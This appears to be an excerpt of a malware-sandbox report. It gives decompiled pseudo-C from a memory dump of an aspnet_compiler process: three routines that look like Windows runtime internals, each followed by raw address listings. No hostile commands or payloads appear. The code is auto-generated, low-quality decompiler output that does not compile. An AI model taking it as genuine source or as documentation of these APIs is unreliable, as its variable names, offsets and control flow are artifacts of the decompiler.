                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 24ff489a7a1d94977334aaa8038a6fbaee9a4bea86ad1b3ea94b7256b3b66159
                          • Instruction ID: 9937a6579c114c9d93779900bad9e0a952108caeb909d8fb6ca40d4b26def4a3
                          • Opcode Fuzzy Hash: 24ff489a7a1d94977334aaa8038a6fbaee9a4bea86ad1b3ea94b7256b3b66159
                          • Instruction Fuzzy Hash: E8910B71E002259BEF219A6DC844BAE7BE8AB14728F490267F910A73F1D7749D81C781
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E013FC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                          				signed int _v8;
                          				char _v1036;
                          				signed int _v1040;
                          				char _v1048;
                          				signed int _v1052;
                          				signed char _v1056;
                          				void* _v1058;
                          				char _v1060;
                          				signed int _v1064;
                          				void* _v1068;
                          				intOrPtr _v1072;
                          				void* _v1084;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t70;
                          				intOrPtr _t72;
                          				signed int _t74;
                          				intOrPtr _t77;
                          				signed int _t78;
                          				signed int _t81;
                          				void* _t101;
                          				signed int _t102;
                          				signed int _t107;
                          				signed int _t109;
                          				signed int _t110;
                          				signed char _t111;
                          				signed int _t112;
                          				signed int _t113;
                          				signed int _t114;
                          				intOrPtr _t116;
                          				void* _t117;
                          				char _t118;
                          				void* _t120;
                          				char _t121;
                          				signed int _t122;
                          				signed int _t123;
                          				signed int _t125;
                          
                          				_t125 = (_t123 & 0xfffffff8) - 0x424;
                          				_v8 =  *0x14ed360 ^ _t125;
                          				_t116 = _a4;
                          				_v1056 = _a16;
                          				_v1040 = _a24;
                          				if(E01406D30( &_v1048, _a8) < 0) {
                          					L4:
                          					_pop(_t117);
                          					_pop(_t120);
                          					_pop(_t101);
                          					return E0143B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                          				}
                          				_t70 = _a20;
                          				if(_t70 >= 0x3f4) {
                          					_t121 = _t70 + 0xc;
                          					L19:
                          					_t107 =  *( *[fs:0x30] + 0x18);
                          					__eflags = _t107;
                          					if(_t107 == 0) {
                          						L60:
                          						_t68 = 0xc0000017;
                          						goto L4;
                          					}
                          					_t72 =  *0x14e7b9c; // 0x0
                          					_t74 = L01414620(_t107, _t107, _t72 + 0x180000, _t121);
                          					_v1064 = _t74;
                          					__eflags = _t74;
                          					if(_t74 == 0) {
                          						goto L60;
                          					}
                          					_t102 = _t74;
                          					_push( &_v1060);
                          					_push(_t121);
                          					_push(_t74);
                          					_push(2);
                          					_push( &_v1048);
                          					_push(_t116);
                          					_t122 = E01439650();
                          					__eflags = _t122;
                          					if(_t122 >= 0) {
                          						L7:
                          						_t114 = _a12;
                          						__eflags = _t114;
                          						if(_t114 != 0) {
                          							_t77 = _a20;
                          							L26:
                          							_t109 =  *(_t102 + 4);
                          							__eflags = _t109 - 3;
                          							if(_t109 == 3) {
                          								L55:
                          								__eflags = _t114 - _t109;
                          								if(_t114 != _t109) {
                          									L59:
                          									_t122 = 0xc0000024;
                          									L15:
                          									_t78 = _v1052;
                          									__eflags = _t78;
                          									if(_t78 != 0) {
                          										L014177F0( *( *[fs:0x30] + 0x18), 0, _t78);
                          									}
                          									_t68 = _t122;
                          									goto L4;
                          								}
                          								_t110 = _v1056;
                          								_t118 =  *((intOrPtr*)(_t102 + 8));
                          								_v1060 = _t118;
                          								__eflags = _t110;
                          								if(_t110 == 0) {
                          									L10:
                          									_t122 = 0x80000005;
                          									L11:
                          									_t81 = _v1040;
                          									__eflags = _t81;
                          									if(_t81 == 0) {
                          										goto L15;
                          									}
                          									__eflags = _t122;
                          									if(_t122 >= 0) {
                          										L14:
                          										 *_t81 = _t118;
                          										goto L15;
                          									}
                          									__eflags = _t122 - 0x80000005;
                          									if(_t122 != 0x80000005) {
                          										goto L15;
                          									}
                          									goto L14;
                          								}
                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                          								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                          									goto L10;
                          								}
                          								_push( *((intOrPtr*)(_t102 + 8)));
                          								_t59 = _t102 + 0xc; // 0xc
                          								_push(_t110);
                          								L54:
                          								E0143F3E0();
                          								_t125 = _t125 + 0xc;
                          								goto L11;
                          							}
                          							__eflags = _t109 - 7;
                          							if(_t109 == 7) {
                          								goto L55;
                          							}
                          							_t118 = 4;
                          							__eflags = _t109 - _t118;
                          							if(_t109 != _t118) {
                          								__eflags = _t109 - 0xb;
                          								if(_t109 != 0xb) {
                          									__eflags = _t109 - 1;
                          									if(_t109 == 1) {
                          										__eflags = _t114 - _t118;
                          										if(_t114 != _t118) {
                          											_t118 =  *((intOrPtr*)(_t102 + 8));
                          											_v1060 = _t118;
                          											__eflags = _t118 - _t77;
                          											if(_t118 > _t77) {
                          												goto L10;
                          											}
                          											_push(_t118);
                          											_t56 = _t102 + 0xc; // 0xc
                          											_push(_v1056);
                          											goto L54;
                          										}
                          										__eflags = _t77 - _t118;
                          										if(_t77 != _t118) {
                          											L34:
                          											_t122 = 0xc0000004;
                          											goto L15;
                          										}
                          										_t111 = _v1056;
                          										__eflags = _t111 & 0x00000003;
                          										if((_t111 & 0x00000003) == 0) {
                          											_v1060 = _t118;
                          											__eflags = _t111;
                          											if(__eflags == 0) {
                          												goto L10;
                          											}
                          											_t42 = _t102 + 0xc; // 0xc
                          											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                          											_v1048 =  *((intOrPtr*)(_t102 + 8));
                          											_push(_t111);
                          											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                          											_push(0);
                          											_push( &_v1048);
                          											_t122 = E014313C0(_t102, _t118, _t122, __eflags);
                          											L44:
                          											_t118 = _v1072;
                          											goto L11;
                          										}
                          										_t122 = 0x80000002;
                          										goto L15;
                          									}
                          									_t122 = 0xc0000024;
                          									goto L44;
                          								}
                          								__eflags = _t114 - _t109;
                          								if(_t114 != _t109) {
                          									goto L59;
                          								}
                          								_t118 = 8;
                          								__eflags = _t77 - _t118;
                          								if(_t77 != _t118) {
                          									goto L34;
                          								}
                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                          								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                          									goto L34;
                          								}
                          								_t112 = _v1056;
                          								_v1060 = _t118;
                          								__eflags = _t112;
                          								if(_t112 == 0) {
                          									goto L10;
                          								}
                          								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                          								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                          								goto L11;
                          							}
                          							__eflags = _t114 - _t118;
                          							if(_t114 != _t118) {
                          								goto L59;
                          							}
                          							__eflags = _t77 - _t118;
                          							if(_t77 != _t118) {
                          								goto L34;
                          							}
                          							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                          							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                          								goto L34;
                          							}
                          							_t113 = _v1056;
                          							_v1060 = _t118;
                          							__eflags = _t113;
                          							if(_t113 == 0) {
                          								goto L10;
                          							}
                          							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                          							goto L11;
                          						}
                          						_t118 =  *((intOrPtr*)(_t102 + 8));
                          						__eflags = _t118 - _a20;
                          						if(_t118 <= _a20) {
                          							_t114 =  *(_t102 + 4);
                          							_t77 = _t118;
                          							goto L26;
                          						}
                          						_v1060 = _t118;
                          						goto L10;
                          					}
                          					__eflags = _t122 - 0x80000005;
                          					if(_t122 != 0x80000005) {
                          						goto L15;
                          					}
                          					L014177F0( *( *[fs:0x30] + 0x18), 0, _t102);
                          					L18:
                          					_t121 = _v1060;
                          					goto L19;
                          				}
                          				_push( &_v1060);
                          				_push(0x400);
                          				_t102 =  &_v1036;
                          				_push(_t102);
                          				_push(2);
                          				_push( &_v1048);
                          				_push(_t116);
                          				_t122 = E01439650();
                          				if(_t122 >= 0) {
                          					__eflags = 0;
                          					_v1052 = 0;
                          					goto L7;
                          				}
                          				if(_t122 == 0x80000005) {
                          					goto L18;
                          				}
                          				goto L4;
                          			}










































                          0x013fc608
                          0x013fc615
                          0x013fc625
                          0x013fc62d
                          0x013fc635
                          0x013fc640
                          0x013fc680
                          0x013fc687
                          0x013fc688
                          0x013fc689
                          0x013fc694
                          0x013fc694
                          0x013fc642
                          0x013fc64a
                          0x013fc697
                          0x01467a25
                          0x01467a2b
                          0x01467a2e
                          0x01467a30
                          0x01467bea
                          0x01467bea
                          0x00000000
                          0x01467bea
                          0x01467a36
                          0x01467a43
                          0x01467a48
                          0x01467a4c
                          0x01467a4e
                          0x00000000
                          0x00000000
                          0x01467a58
                          0x01467a5a
                          0x01467a5b
                          0x01467a5c
                          0x01467a5d
                          0x01467a63
                          0x01467a64
                          0x01467a6a
                          0x01467a6c
                          0x01467a6e
                          0x014679cb
                          0x014679cb
                          0x014679ce
                          0x014679d0
                          0x01467a98
                          0x01467a9b
                          0x01467a9b
                          0x01467a9e
                          0x01467aa1
                          0x01467bbe
                          0x01467bbe
                          0x01467bc0
                          0x01467be0
                          0x01467be0
                          0x01467a01
                          0x01467a01
                          0x01467a05
                          0x01467a07
                          0x01467a15
                          0x01467a15
                          0x01467a1a
                          0x00000000
                          0x01467a1a
                          0x01467bc2
                          0x01467bc6
                          0x01467bc9
                          0x01467bcd
                          0x01467bcf
                          0x014679e6
                          0x014679e6
                          0x014679eb
                          0x014679eb
                          0x014679ef
                          0x014679f1
                          0x00000000
                          0x00000000
                          0x014679f3
                          0x014679f5
                          0x014679ff
                          0x014679ff
                          0x00000000
                          0x014679ff
                          0x014679f7
                          0x014679fd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014679fd
                          0x01467bd5
                          0x01467bd8
                          0x00000000
                          0x00000000
                          0x01467ba9
                          0x01467bac
                          0x01467bb0
                          0x01467bb1
                          0x01467bb1
                          0x01467bb6
                          0x00000000
                          0x01467bb6
                          0x01467aa7
                          0x01467aaa
                          0x00000000
                          0x00000000
                          0x01467ab2
                          0x01467ab3
                          0x01467ab5
                          0x01467aec
                          0x01467aef
                          0x01467b25
                          0x01467b28
                          0x01467b62
                          0x01467b64
                          0x01467b8f
                          0x01467b92
                          0x01467b96
                          0x01467b98
                          0x00000000
                          0x00000000
                          0x01467b9e
                          0x01467b9f
                          0x01467ba3
                          0x00000000
                          0x01467ba3
                          0x01467b66
                          0x01467b68
                          0x01467ae2
                          0x01467ae2
                          0x00000000
                          0x01467ae2
                          0x01467b6e
                          0x01467b72
                          0x01467b75
                          0x01467b81
                          0x01467b85
                          0x01467b87
                          0x00000000
                          0x00000000
                          0x01467b31
                          0x01467b34
                          0x01467b3c
                          0x01467b45
                          0x01467b46
                          0x01467b4f
                          0x01467b51
                          0x01467b57
                          0x01467b59
                          0x01467b59
                          0x00000000
                          0x01467b59
                          0x01467b77
                          0x00000000
                          0x01467b77
                          0x01467b2a
                          0x00000000
                          0x01467b2a
                          0x01467af1
                          0x01467af3
                          0x00000000
                          0x00000000
                          0x01467afb
                          0x01467afc
                          0x01467afe
                          0x00000000
                          0x00000000
                          0x01467b00
                          0x01467b03
                          0x00000000
                          0x00000000
                          0x01467b05
                          0x01467b09
                          0x01467b0d
                          0x01467b0f
                          0x00000000
                          0x00000000
                          0x01467b18
                          0x01467b1d
                          0x00000000
                          0x01467b1d
                          0x01467ab7
                          0x01467ab9
                          0x00000000
                          0x00000000
                          0x01467abf
                          0x01467ac1
                          0x00000000
                          0x00000000
                          0x01467ac3
                          0x01467ac6
                          0x00000000
                          0x00000000
                          0x01467ac8
                          0x01467acc
                          0x01467ad0
                          0x01467ad2
                          0x00000000
                          0x00000000
                          0x01467adb
                          0x00000000
                          0x01467adb
                          0x014679d6
                          0x014679d9
                          0x014679dc
                          0x01467a91
                          0x01467a94
                          0x00000000
                          0x01467a94
                          0x014679e2
                          0x00000000
                          0x014679e2
                          0x01467a74
                          0x01467a7a
                          0x00000000
                          0x00000000
                          0x01467a8a
                          0x01467a21
                          0x01467a21
                          0x00000000
                          0x01467a21
                          0x013fc650
                          0x013fc651
                          0x013fc656
                          0x013fc65c
                          0x013fc65d
                          0x013fc663
                          0x013fc664
                          0x013fc66a
                          0x013fc66e
                          0x014679c5
                          0x014679c7
                          0x00000000
                          0x014679c7
                          0x013fc67a
                          0x00000000
                          0x00000000
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 06179983bd5c014b0108a8f9b7936c480e0f139062f85af47bbfdd30cc397cf3
                          • Instruction ID: c7722d512509d5dfb693678f56c2da7468fc900a2e87f909c6e29e8c34dad075
                          • Opcode Fuzzy Hash: 06179983bd5c014b0108a8f9b7936c480e0f139062f85af47bbfdd30cc397cf3
                          • Instruction Fuzzy Hash: 33817C756442028BDB22CE58C880A7B77E8EF8465DF18486FEE459B361D330ED45CBA3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E0142138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
                          				void* _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				void* __ebx;
                          				signed int _t97;
                          				signed int _t102;
                          				void* _t105;
                          				char* _t112;
                          				signed int _t113;
                          				signed int _t117;
                          				signed int _t119;
                          				signed int* _t122;
                          				signed int _t124;
                          				signed int _t130;
                          				signed int _t136;
                          				char _t150;
                          				intOrPtr _t153;
                          				signed int _t161;
                          				signed int _t163;
                          				signed int _t170;
                          				signed int _t175;
                          				signed int _t176;
                          				signed int _t182;
                          				signed int* _t183;
                          				signed int* _t184;
                          
                          				_t182 = __ecx;
                          				_t153 = _a24;
                          				_t183 = __edx;
                          				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
                          				_t97 = _t153 - _a16;
                          				if(_t97 > 0xfffff000) {
                          					L19:
                          					return 0;
                          				}
                          				asm("cdq");
                          				_t150 = _a20;
                          				_v16 = _t97 / 0x1000;
                          				_t102 = _a4 + 0x00000007 & 0xfffffff8;
                          				_t170 = _t102 + __edx;
                          				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
                          				_t105 = _t170 + 0x28;
                          				_v12 = _t170;
                          				if(_t105 >= _t150) {
                          					if(_t105 >= _t153) {
                          						goto L19;
                          					}
                          					_v8 = _t170 - _t150 + 8;
                          					_push(E01420678(__ecx, 1));
                          					_push(0x1000);
                          					_push( &_v8);
                          					_push(0);
                          					_push( &_a20);
                          					_push(0xffffffff);
                          					if(E01439660() < 0) {
                          						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
                          						goto L19;
                          					}
                          					if(E01417D50() == 0) {
                          						_t112 = 0x7ffe0380;
                          					} else {
                          						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          					}
                          					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                          						E014B138A(_t150, _t182, _a20, _v8, 3);
                          					}
                          					_t150 = _a20 + _v8;
                          					_t153 = _a24;
                          					_a20 = _t150;
                          				}
                          				_t183[0] = 1;
                          				_t113 = _t153 - _t150;
                          				_t183[1] = 1;
                          				asm("cdq");
                          				_t175 = _t113 % 0x1000;
                          				_v28 = _t113 / 0x1000;
                          				 *_t183 = _v20;
                          				_t183[1] =  *(_t182 + 0x54);
                          				if((_v24 & 0x00001000) != 0) {
                          					_t117 = E014216C7(1, _t175);
                          					_t150 = _a20;
                          					_t183[0xd] = _t117;
                          				}
                          				_t183[0xb] = _t183[0xb] & 0x00000000;
                          				_t176 = _v12;
                          				_t183[3] = _a12;
                          				_t119 = _a16;
                          				_t183[7] = _t119;
                          				_t161 = _v16 << 0xc;
                          				_t183[6] = _t182;
                          				_t183[0xa] = _t119 + _t161;
                          				_t183[8] = _v16;
                          				_t122 =  &(_t183[0xe]);
                          				_t183[2] = 0xffeeffee;
                          				_t183[9] = _t176;
                          				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
                          				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
                          				_t122[1] = _t122;
                          				 *_t122 = _t122;
                          				if(_t183[6] != _t183) {
                          					_t124 = 1;
                          				} else {
                          					_t124 = 0;
                          				}
                          				_t183[1] = _t124;
                          				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
                          				if(_t183[6] != _t183) {
                          					_t130 = (_t176 - _t183 >> 0x10) + 1;
                          					_v24 = _t130;
                          					if(_t130 >= 0xfe) {
                          						_push(_t161);
                          						_push(0);
                          						E014BA80D(_t183[6], 3, _t176, _t183);
                          						_t150 = _a20;
                          						_t176 = _v12;
                          						_t130 = _v24;
                          					}
                          				} else {
                          					_t130 = 0;
                          				}
                          				 *(_t176 + 6) = _t130;
                          				E0141B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
                          				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
                          					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
                          					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
                          				}
                          				if(_v8 != 0) {
                          					E0141A830(_t182, _v12, _v8);
                          				}
                          				_t136 = _t182 + 0xa4;
                          				_t184 =  &(_t183[4]);
                          				_t163 =  *(_t136 + 4);
                          				if( *_t163 != _t136) {
                          					_push(_t163);
                          					_push( *_t163);
                          					E014BA80D(0, 0xd, _t136, 0);
                          				} else {
                          					 *_t184 = _t136;
                          					_t184[1] = _t163;
                          					 *_t163 = _t184;
                          					 *(_t136 + 4) = _t184;
                          				}
                          				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
                          				return 1;
                          			}































                          0x0142139f
                          0x014213a1
                          0x014213a4
                          0x014213a6
                          0x014213ab
                          0x014213b3
                          0x01465522
                          0x00000000
                          0x01465522
                          0x014213b9
                          0x014213c1
                          0x014213c4
                          0x014213cd
                          0x014213d0
                          0x014213d9
                          0x014213dc
                          0x014213df
                          0x014213e4
                          0x0146552b
                          0x00000000
                          0x00000000
                          0x01465534
                          0x0146553f
                          0x01465545
                          0x01465549
                          0x0146554a
                          0x0146554f
                          0x01465550
                          0x01465559
                          0x0146551c
                          0x00000000
                          0x0146551c
                          0x01465562
                          0x01465574
                          0x01465564
                          0x0146556d
                          0x0146556d
                          0x0146557c
                          0x01465597
                          0x01465597
                          0x0146559f
                          0x014655a2
                          0x014655a5
                          0x014655a5
                          0x014213ec
                          0x014213f2
                          0x014213f4
                          0x014213f8
                          0x014213fe
                          0x01421400
                          0x01421406
                          0x01421412
                          0x01421419
                          0x014655b0
                          0x014655b5
                          0x014655b8
                          0x014655b8
                          0x01421425
                          0x01421429
                          0x0142142c
                          0x0142142f
                          0x01421432
                          0x01421435
                          0x0142143a
                          0x0142143d
                          0x01421443
                          0x01421446
                          0x01421449
                          0x01421450
                          0x01421453
                          0x01421459
                          0x0142145f
                          0x01421462
                          0x01421467
                          0x014214fa
                          0x0142146d
                          0x0142146d
                          0x0142146d
                          0x0142146f
                          0x01421479
                          0x01421480
                          0x01421507
                          0x01421508
                          0x01421510
                          0x014655c1
                          0x014655c2
                          0x014655cc
                          0x014655d1
                          0x014655d4
                          0x014655d7
                          0x014655d7
                          0x01421482
                          0x01421482
                          0x01421482
                          0x01421484
                          0x0142149b
                          0x014214a4
                          0x014214ae
                          0x014214b4
                          0x014214b4
                          0x014214ba
                          0x014214c4
                          0x014214c4
                          0x014214c9
                          0x014214cf
                          0x014214d2
                          0x014214d7
                          0x014655df
                          0x014655e0
                          0x014655ea
                          0x014214dd
                          0x014214dd
                          0x014214df
                          0x014214e2
                          0x014214e4
                          0x014214e4
                          0x014214e7
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                          • Instruction ID: 363ba3853bd940a102c4a36705ba1d5c4d6c1bff0e0c73b6de98ecad38265c6a
                          • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                          • Instruction Fuzzy Hash: E581AD71A003459FCB24CF68C584BAABBF5EF58304F10856EE94AC7761D330EA81CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E0148B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                          				char _v8;
                          				signed int _v12;
                          				signed int _t80;
                          				signed int _t83;
                          				intOrPtr _t89;
                          				signed int _t92;
                          				signed char _t106;
                          				signed int* _t107;
                          				intOrPtr _t108;
                          				intOrPtr _t109;
                          				signed int _t114;
                          				void* _t115;
                          				void* _t117;
                          				void* _t119;
                          				void* _t122;
                          				signed int _t123;
                          				signed int* _t124;
                          
                          				_t106 = _a12;
                          				if((_t106 & 0xfffffffc) != 0) {
                          					return 0xc000000d;
                          				}
                          				if((_t106 & 0x00000002) != 0) {
                          					_t106 = _t106 | 0x00000001;
                          				}
                          				_t109 =  *0x14e7b9c; // 0x0
                          				_t124 = L01414620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                          				if(_t124 != 0) {
                          					 *_t124 =  *_t124 & 0x00000000;
                          					_t124[1] = _t124[1] & 0x00000000;
                          					_t124[4] = _t124[4] & 0x00000000;
                          					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                          						L13:
                          						_push(_t124);
                          						if((_t106 & 0x00000002) != 0) {
                          							_push(0x200);
                          							_push(0x28);
                          							_push(0xffffffff);
                          							_t122 = E01439800();
                          							if(_t122 < 0) {
                          								L33:
                          								if((_t124[4] & 0x00000001) != 0) {
                          									_push(4);
                          									_t64 =  &(_t124[1]); // 0x4
                          									_t107 = _t64;
                          									_push(_t107);
                          									_push(5);
                          									_push(0xfffffffe);
                          									E014395B0();
                          									if( *_t107 != 0) {
                          										_push( *_t107);
                          										E014395D0();
                          									}
                          								}
                          								_push(_t124);
                          								_push(0);
                          								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                          								L37:
                          								L014177F0();
                          								return _t122;
                          							}
                          							_t124[4] = _t124[4] | 0x00000002;
                          							L18:
                          							_t108 = _a8;
                          							_t29 =  &(_t124[0x105]); // 0x414
                          							_t80 = _t29;
                          							_t30 =  &(_t124[5]); // 0x14
                          							_t124[3] = _t80;
                          							_t123 = 0;
                          							_t124[2] = _t30;
                          							 *_t80 = _t108;
                          							if(_t108 == 0) {
                          								L21:
                          								_t112 = 0x400;
                          								_push( &_v8);
                          								_v8 = 0x400;
                          								_push(_t124[2]);
                          								_push(0x400);
                          								_push(_t124[3]);
                          								_push(0);
                          								_push( *_t124);
                          								_t122 = E01439910();
                          								if(_t122 != 0xc0000023) {
                          									L26:
                          									if(_t122 != 0x106) {
                          										L40:
                          										if(_t122 < 0) {
                          											L29:
                          											_t83 = _t124[2];
                          											if(_t83 != 0) {
                          												_t59 =  &(_t124[5]); // 0x14
                          												if(_t83 != _t59) {
                          													L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                          												}
                          											}
                          											_push( *_t124);
                          											E014395D0();
                          											goto L33;
                          										}
                          										 *_a16 = _t124;
                          										return 0;
                          									}
                          									if(_t108 != 1) {
                          										_t122 = 0;
                          										goto L40;
                          									}
                          									_t122 = 0xc0000061;
                          									goto L29;
                          								} else {
                          									goto L22;
                          								}
                          								while(1) {
                          									L22:
                          									_t89 =  *0x14e7b9c; // 0x0
                          									_t92 = L01414620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                          									_t124[2] = _t92;
                          									if(_t92 == 0) {
                          										break;
                          									}
                          									_t112 =  &_v8;
                          									_push( &_v8);
                          									_push(_t92);
                          									_push(_v8);
                          									_push(_t124[3]);
                          									_push(0);
                          									_push( *_t124);
                          									_t122 = E01439910();
                          									if(_t122 != 0xc0000023) {
                          										goto L26;
                          									}
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                          								}
                          								_t122 = 0xc0000017;
                          								goto L26;
                          							}
                          							_t119 = 0;
                          							do {
                          								_t114 = _t124[3];
                          								_t119 = _t119 + 0xc;
                          								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                          								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                          								_t123 = _t123 + 1;
                          								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                          							} while (_t123 < _t108);
                          							goto L21;
                          						}
                          						_push(0x28);
                          						_push(3);
                          						_t122 = E013FA7B0();
                          						if(_t122 < 0) {
                          							goto L33;
                          						}
                          						_t124[4] = _t124[4] | 0x00000001;
                          						goto L18;
                          					}
                          					if((_t106 & 0x00000001) == 0) {
                          						_t115 = 0x28;
                          						_t122 = E0148E7D3(_t115, _t124);
                          						if(_t122 < 0) {
                          							L9:
                          							_push(_t124);
                          							_push(0);
                          							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                          							goto L37;
                          						}
                          						L12:
                          						if( *_t124 != 0) {
                          							goto L18;
                          						}
                          						goto L13;
                          					}
                          					_t15 =  &(_t124[1]); // 0x4
                          					_t117 = 4;
                          					_t122 = E0148E7D3(_t117, _t15);
                          					if(_t122 >= 0) {
                          						_t124[4] = _t124[4] | 0x00000001;
                          						_v12 = _v12 & 0x00000000;
                          						_push(4);
                          						_push( &_v12);
                          						_push(5);
                          						_push(0xfffffffe);
                          						E014395B0();
                          						goto L12;
                          					}
                          					goto L9;
                          				} else {
                          					return 0xc0000017;
                          				}
                          			}




















                          0x0148b8d9
                          0x0148b8e4
                          0x00000000
                          0x0148b8e6
                          0x0148b8f3
                          0x0148b8f5
                          0x0148b8f5
                          0x0148b8f8
                          0x0148b920
                          0x0148b924
                          0x0148b936
                          0x0148b939
                          0x0148b93d
                          0x0148b948
                          0x0148b9a0
                          0x0148b9a0
                          0x0148b9a4
                          0x0148b9bf
                          0x0148b9c4
                          0x0148b9c6
                          0x0148b9cd
                          0x0148b9d1
                          0x0148bad4
                          0x0148bad8
                          0x0148bada
                          0x0148badc
                          0x0148badc
                          0x0148badf
                          0x0148bae0
                          0x0148bae2
                          0x0148bae4
                          0x0148baec
                          0x0148baee
                          0x0148baf0
                          0x0148baf0
                          0x0148baec
                          0x0148bafb
                          0x0148bafc
                          0x0148bafe
                          0x0148bb01
                          0x0148bb01
                          0x00000000
                          0x0148bb06
                          0x0148b9d7
                          0x0148b9db
                          0x0148b9db
                          0x0148b9de
                          0x0148b9de
                          0x0148b9e4
                          0x0148b9e7
                          0x0148b9ea
                          0x0148b9ec
                          0x0148b9ef
                          0x0148b9f3
                          0x0148ba1b
                          0x0148ba1b
                          0x0148ba23
                          0x0148ba24
                          0x0148ba27
                          0x0148ba2a
                          0x0148ba2b
                          0x0148ba2e
                          0x0148ba30
                          0x0148ba37
                          0x0148ba3f
                          0x0148ba9c
                          0x0148baa2
                          0x0148bb13
                          0x0148bb15
                          0x0148baae
                          0x0148baae
                          0x0148bab3
                          0x0148bab5
                          0x0148baba
                          0x0148bac8
                          0x0148bac8
                          0x0148baba
                          0x0148bacd
                          0x0148bacf
                          0x00000000
                          0x0148bacf
                          0x0148bb1a
                          0x00000000
                          0x0148bb1c
                          0x0148baa7
                          0x0148bb11
                          0x00000000
                          0x0148bb11
                          0x0148baa9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0148ba41
                          0x0148ba41
                          0x0148ba41
                          0x0148ba58
                          0x0148ba5d
                          0x0148ba62
                          0x00000000
                          0x00000000
                          0x0148ba64
                          0x0148ba67
                          0x0148ba68
                          0x0148ba69
                          0x0148ba6c
                          0x0148ba6f
                          0x0148ba71
                          0x0148ba78
                          0x0148ba80
                          0x00000000
                          0x00000000
                          0x0148ba90
                          0x0148ba90
                          0x0148ba97
                          0x00000000
                          0x0148ba97
                          0x0148b9f5
                          0x0148b9f7
                          0x0148b9f7
                          0x0148b9fa
                          0x0148ba03
                          0x0148ba07
                          0x0148ba0c
                          0x0148ba10
                          0x0148ba17
                          0x00000000
                          0x0148b9f7
                          0x0148b9a6
                          0x0148b9a8
                          0x0148b9af
                          0x0148b9b3
                          0x00000000
                          0x00000000
                          0x0148b9b9
                          0x00000000
                          0x0148b9b9
                          0x0148b94d
                          0x0148b98f
                          0x0148b995
                          0x0148b999
                          0x0148b960
                          0x0148b967
                          0x0148b968
                          0x0148b96a
